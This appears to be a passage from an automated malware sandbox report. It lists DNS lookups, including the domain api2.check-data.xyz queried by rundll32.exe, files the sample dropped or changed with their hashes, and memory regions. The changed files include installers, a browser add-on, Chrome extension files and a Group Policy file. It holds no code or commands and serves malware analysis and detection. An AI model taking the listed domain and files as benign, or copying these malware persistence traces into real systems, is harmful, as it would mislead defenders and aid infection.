                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      73.190.18.2.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      202.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      74 B
                                                                                                                                                                                                                      113 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      202.187.250.142.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      67.169.217.172.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      73 B
                                                                                                                                                                                                                      111 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      67.169.217.172.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      clients2.google.com
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      65 B
                                                                                                                                                                                                                      105 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      clients2.google.com

                                                                                                                                                                                                                      DNS Response

                                                                                                                                                                                                                      142.250.187.238

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      clients2.googleusercontent.com
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      RfVdqZS.exe
                                                                                                                                                                                                                      76 B
                                                                                                                                                                                                                      121 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      clients2.googleusercontent.com

                                                                                                                                                                                                                      DNS Response

                                                                                                                                                                                                                      172.217.16.225

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      238.187.250.142.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      74 B
                                                                                                                                                                                                                      113 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      238.187.250.142.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      73 B
                                                                                                                                                                                                                      140 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      225.16.217.172.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      api2.check-data.xyz
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      rundll32.exe
                                                                                                                                                                                                                      65 B
                                                                                                                                                                                                                      159 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      api2.check-data.xyz

                                                                                                                                                                                                                      DNS Response

                                                                                                                                                                                                                      44.235.138.214
                                                                                                                                                                                                                      44.237.26.169

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      214.138.235.44.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      73 B
                                                                                                                                                                                                                      137 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      214.138.235.44.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      11.227.111.52.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      72 B
                                                                                                                                                                                                                      158 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      11.227.111.52.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      77.190.18.2.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      70 B
                                                                                                                                                                                                                      133 B
                                                                                                                                                                                                                      1
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      77.190.18.2.in-addr.arpa

                                                                                                                                                                                                                    • 8.8.8.8:53
                                                                                                                                                                                                                      14.173.189.20.in-addr.arpa
                                                                                                                                                                                                                      dns
                                                                                                                                                                                                                      144 B
                                                                                                                                                                                                                      158 B
                                                                                                                                                                                                                      2
                                                                                                                                                                                                                      1

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      14.173.189.20.in-addr.arpa

                                                                                                                                                                                                                      DNS Request

                                                                                                                                                                                                                      14.173.189.20.in-addr.arpa

                                                                                                                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                                                                                                                    Replay Monitor

                                                                                                                                                                                                                    Loading Replay Monitor...

                                                                                                                                                                                                                    Downloads

                                                                                                                                                                                                                    • C:\$RECYCLE.BIN\S-1-5-18\desktop.ini

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      129B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      a526b9e7c716b3489d8cc062fbce4005

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      2df502a944ff721241be20a9e449d2acd07e0312

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      e1b9ce9b57957b1a0607a72a057d6b7a9b34ea60f3f8aa8f38a3af979bd23066

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      d83d4c656c96c3d1809ad06ce78fa09a77781461c99109e4b81d1a186fc533a7e72d65a4cb7edf689eeccda8f687a13d3276f1111a1e72f7c3cd92a49bce0f88

                                                                                                                                                                                                                    • C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\NXbwydK.xml

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      c4fcedf800b0bb7fd5e5311f6cfaa93c

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      4c6f6a0398e6dfc1cd3105cf0dd9c26a660d7970

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      c2287ab70cdf617a88e6ab769350d421ae45ec72c92d15ad9ed53a45823bbdf4

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      d075339d632475ad86164c78a05db8f6dab1084ba5ef6d4c1e5c3a9ecff513b01e92f4442096b8d2fbe0f87278b162428bfac6949e19d4ec633192b8c9b6af9d

                                                                                                                                                                                                                    • C:\Program Files (x86)\REeMUtPoCvFU2\NpeMHAw.xml

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      1e505cf28dc5dc87521f36b7c8236f96

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      f4ab4bc72bfdc7b23ac226501bb9cf4617f262f8

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      865bcb1a711823c34be99680387320fa1ac325e05a3e2891cff147971afd26c4

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      29ffa98cca1a55c6d23a361a513a9144cddb0f9af49596e3ca0b6c1dc0bc67fc3139e5b18afff5c5355a174e10e94056379e157fea6024e473819bd7ecb48be0

                                                                                                                                                                                                                    • C:\Program Files (x86)\kLpsRMujXEpbC\XnyNHtr.xml

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      165308698abce418ad3bb1c7ae4b900f

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      4ed02a7676636f1c2eca9219772e3ed424d26738

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      23735b888c93095b7629697fd08ae6bae2a31a59bbdac6438d292bfc4923f331

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      885f93b006ffad6b4077b65c6702de5ca3a9559da24dc2cf16687d01bb0d4c0198a2992b1c7599df62e0dc77397ecf52742537df5b4eeeb48a497ec1f91c071d

                                                                                                                                                                                                                    • C:\Program Files (x86)\tffvHWJZU\acexVhh.xml

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      6aaf496e2f7ad783454470c59b0ed8f6

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      7b146eecfd19a22cab9b18dd3a13c28cb35d318e

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      ea4248dd30b73db6f1f424b139de8389c7a76b43e0fcff4540b5b131605aa9c8

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      9cc01c3baaa049e9e6a25c01830b104ad3b04c4e51e7fd6e848cb8c302de14a21b46916838c1c02bd754a3bb4ceed9cbfae6e5ebd078d3abfa67023327774ed8

                                                                                                                                                                                                                    • C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2.5MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      894f2b0db71de277d5bb85f0506d77cc

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      6c3b2513146e61e78350a43ae3f3f90192a7f6be

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      a83147e379aded12d109098fd0406dd3b11363e402fad9ed172183ccf83d7082

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      7b7fc1c480d468d8159a269e0ec61cace4ed32af5a373d81d99ab97b0cc0d3c50b731160dba3e1500934b7cc451d3a41df7c7a6681b8d5f9279e58d847e00d58

                                                                                                                                                                                                                    • C:\ProgramData\NGysLhxJEZNwhMVB\wPXELrG.xml

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      1b62a70699fcd547d8e1e306691477fa

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      28b6c1de23742ce48ccd9d899596bca87f4b2d54

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      ca923cc828534f833605f26758a7254c42a2749387c929036df35e935a038ced

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      68e4595a29b365f161e7a505aed800d891d610ba0c881ac45eed1ad6d94256d17fd500fd23634c5469d50d0af697e3efb65028d3d181ac10a8f93b81a78bc38c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      187B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2a1e12a4811892d95962998e184399d8

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      136B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      238d2612f510ea51d0d3eaa09e7136b1

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      0953540c6c2fd928dd03b38c43f6e8541e1a0328

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      150B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      0b1cf3deab325f8987f2ee31c6afc8ea

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      6a51537cef82143d3d768759b21598542d683904

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      10KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      e7f5f823f9e14430cb1e8dad11a3b763

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      191cf315435e05017e0cae0b7f351b35d6bd8896

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      49b132c285c25d79956054bce00df831031738accb763cae976510770ea3a141

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      e255401c8d5dd9ae55f7bcf0a9dd6bd05d6698188d9a2b8b9deea9141c5365c01a6b8333bfe5d099c63f3e1a993e2ec5e04fc5efe17f498ffc05faf517216ff3

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      34KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2cc51d551ebe9e177a08029936c2f5c1

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      48236f348f5a33fcab2233f5055e403ce445c77f

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      c3c03cbc0e8b5eb750099b17babae3267b33223dfe18ee46aacfd907f99fe42c

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      fff57e3d5498147befe408d0859c80fd9c5166c049087c27ceaedbf55b1bac7f7881dab146a3a4081256e342f653f1f79b9ca5a148fc4fc96e2103ff86a30450

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      2KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      6bf0e5945fb9da68e1b03bdaed5f6f8d

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      eed3802c8e4abe3b327c100c99c53d3bbcf8a33d

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      dda58fd16fee83a65c05936b1a070187f2c360024650ecaf857c5e060a6a55f1

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      977a393fdad2b162aa42194ddad6ec8bcab24f81980ff01b1c22c4d59ac268bb5ce947105c968de1a8a66b35023280a1e7709dfea5053385f87141389ebecb25

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      12KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2dd10b5dd47e86be3b5959d6cd57dc50

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      40107258e3bad9bbe3e105395a29b6c3dea1c347

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      a546d8a0ed4d11fa9ec52c6278878fe0039d3841c0f61ed7e4acb9196837f6d9

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      b5b99776bf62066f73ce188ab6e30e30191d110cde4b82eb457aadcfee8a5e0431c0a4c32f4448c648a0e34b09049c6eac2896092b043d9647f88261ac4ba97b

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      15KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      36301838474d497b50c2233aaba0f32e

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      482f140f34010ea5264bd659ac9eb548b431b7d2

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      ac5dc20c876a6e201a98cf5b17f55533c76262157006b87cb8ee068700db1aaf

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      7a3a97c8c2cca6d0cd351baeab2737c6b6d05aa3c4357eecd66fc95ac3552d47dd34951e9425a821bb1405f10cb1c7edeb4f37cc45db48a29fee9df309d41f64

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS72FD.tmp\Install.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.2MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      b5bf7cc6c719be90223dc07f2688456b

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      8bba06f5f762ab22b17a0325dae1f66db573c33e

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      3876c068cc15a62cc6facd941c1ffee3686b8f3e29b0e5258f7d34a2d22fd8e0

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      32f8f211bc26d197941af64fddc8b02e147335f3b1cda63dad2169af5bcbbf9f0e3489567a82d5ce4b83593ec89b7c9ba1a12e10e1b33bb7ffbfc256eea752b1

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS74E2.tmp\Install.exe

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      f82b10ad392bbd43cbd81d1da4cdd6f5

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      f4adf6325e87456c49db780a7540a414717cf1f3

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      056dc56035a562b5296aca8b8ab1dbf742c36f4d1830885ea7302944d04d1d79

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      1d6c98715cf7e38ce21c697f0976c95c8f183a04a2f32372f58c18bb1d5881ffa67910ce96b765dab7f15cfcc983d051448c4a1b4557170c18a04ec3e2b1d616

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5fkjun5k.wbi.ps1

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      1B

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      c4ca4238a0b923820dcc509a6f75849b

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\6lk2b5bo.default-release\prefs.js

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      5e193a7180dd5dec3a76f44b3ae5c055

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      987b23541574d02dd0a50f284bd9612f0abf53e0

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      e81b6581ac6a26e4197dc9c0e33a0a32575c39f79dc292da6846749fff014653

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      fcfde5f2494b4d89e440c70462357c259f0488352c672abcfb0a12e8f3228ef30214a101e33b61318bf07919d483269fa6cf557f2d1526258085ed1b272b90f1

                                                                                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      15KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      731f197330ce1bb790209580a9039608

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      7d693c77f7f0fb2d1a750c433db4e77030a356eb

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      49ac042e1b9995579bc45bd5e148b8b70c37b1ee626c8ee7dbdd72bb87c9c97d

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      9b2793d72c9783c43a673b6cad8ef737d713ba26def67ea1c6df2ed0c3472c4976f7b51a3b245fd5e791a2cefb2f32d48d2ea25851ce24cec1dfd9f046cdd3f1

                                                                                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      12KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      0036ab0af5f8b27f0568eeb062595c1b

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      e595887b9e7d00541301db5a2056b0f35e8e2712

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      93dcb1c64c6cd6c89c835750232fae40bd90ff1d1b84308fe422a39e7e463e7f

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      f9750e84a080be36b6edc8540039875654cee1ed364db48684c352b0ee71206f2328a1a6844cd4644c38b56250f85410911ae52460d34e141162e022f7ee1a74

                                                                                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      12KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      6d7718e47a9818cf53333cc09351b79e

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      b994ab469aac5201d9dc0388914fe51a341780a4

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      a4fd8f9fec3d49aa6e32f156b5e49f8bca23629d9bca9b3baa78a62a8340eada

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      3d64d8ceeea136cf44527c081e4950d79adea311a56e69e084110814561909fa9bac11f99743c4a43175584b318e25bb19a28173a1cc9e13abe6ef851be7db60

                                                                                                                                                                                                                    • C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      15KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      a350d1cb8638df2b094549cd52f52aea

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      782d89c1043729a08b6ab54269f7c24ca06978e8

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      683a5e25dea393102d5a7d10be015d6584a58eabf24b75e5a5bf1e9712a05730

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      1e361edb10f951398303fbcb0ef3272a0b5b972facb982e94d05d02a685e666a4cd7152946951d5ddd87841514836fc80aebf0c6d15ff29e8f2d3d4143c76a4b

                                                                                                                                                                                                                    • C:\Windows\Temp\mrYrpJCpOmktZWwz\tGrdyDPQ\qKferQk.dll

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      2ab490e0b4b1767a1780c820fea740f1

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      81a97ba2e6b1b98d2597790f76d269e6c3d43449

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      3bcd6700c0f9f9bb1cd2ebd1a1808bdf6dc20c19bd514d050bce73da8d555f0f

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      d7d0c37702f68cecc4ad5a49afbf05bd8c638d65b85c959811bad7cec2399c53524bead1beb98c1139effa344dce342bc77a39fa041ce580c0f861ec2feb7843

                                                                                                                                                                                                                    • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6KB

                                                                                                                                                                                                                      MD5

                                                                                                                                                                                                                      03944af2fb533e34fc8b7c667db87f6e

                                                                                                                                                                                                                      SHA1

                                                                                                                                                                                                                      5f5d1279d331dd991e3746c81c5a3a1ca8048512

                                                                                                                                                                                                                      SHA256

                                                                                                                                                                                                                      957e9c63cf9807c73020a3e7c28be5d5bb40e98e6d6ef12a160a7a638dcb2783

                                                                                                                                                                                                                      SHA512

                                                                                                                                                                                                                      62550c136ddbe329b33d7c4d562a24e4fba11311b6d5ad8d71314c40ef729485d8ca3f1221e60ed64a11f3bebac792a95d5c8c0dc33d533085bca0727d0c0bda

                                                                                                                                                                                                                    • memory/692-75-0x00000000066D0000-0x000000000671B000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                    • memory/692-74-0x0000000006310000-0x0000000006660000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                    • memory/1592-497-0x0000000003F60000-0x0000000004543000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                                    • memory/2704-103-0x0000000006B90000-0x0000000006EE0000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                    • memory/2704-105-0x0000000007510000-0x000000000755B000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                    • memory/3544-143-0x000001B1A2520000-0x000001B1A2596000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      472KB

                                                                                                                                                                                                                    • memory/3544-139-0x000001B1A2360000-0x000001B1A2382000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                    • memory/4040-178-0x0000000006450000-0x00000000067A0000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                    • memory/4056-502-0x0000000000DC0000-0x000000000142A000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                    • memory/4056-165-0x0000000000DC0000-0x000000000142A000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                    • memory/4056-11-0x0000000000DC0000-0x000000000142A000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.4MB

                                                                                                                                                                                                                    • memory/4056-49-0x0000000010000000-0x00000000105E3000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      5.9MB

                                                                                                                                                                                                                    • memory/4204-17-0x0000000008000000-0x0000000008066000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                    • memory/4204-22-0x0000000008A40000-0x0000000008AB6000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      472KB

                                                                                                                                                                                                                    • memory/4204-14-0x0000000004EA0000-0x0000000004ED6000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      216KB

                                                                                                                                                                                                                    • memory/4204-15-0x00000000079D0000-0x0000000007FF8000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      6.2MB

                                                                                                                                                                                                                    • memory/4204-16-0x0000000007830000-0x0000000007852000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                    • memory/4204-18-0x00000000081C0000-0x0000000008226000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      408KB

                                                                                                                                                                                                                    • memory/4204-19-0x00000000083E0000-0x0000000008730000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      3.3MB

                                                                                                                                                                                                                    • memory/4204-20-0x00000000080D0000-0x00000000080EC000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      112KB

                                                                                                                                                                                                                    • memory/4204-21-0x0000000008970000-0x00000000089BB000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      300KB

                                                                                                                                                                                                                    • memory/4204-40-0x0000000009EB0000-0x000000000A3AE000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      5.0MB

                                                                                                                                                                                                                    • memory/4204-38-0x00000000097D0000-0x00000000097EA000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      104KB

                                                                                                                                                                                                                    • memory/4204-39-0x0000000009820000-0x0000000009842000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      136KB

                                                                                                                                                                                                                    • memory/4204-37-0x0000000009850000-0x00000000098E4000-memory.dmp

                                                                                                                                                                                                                      Filesize

                                                                                                                                                                                                                      592KB

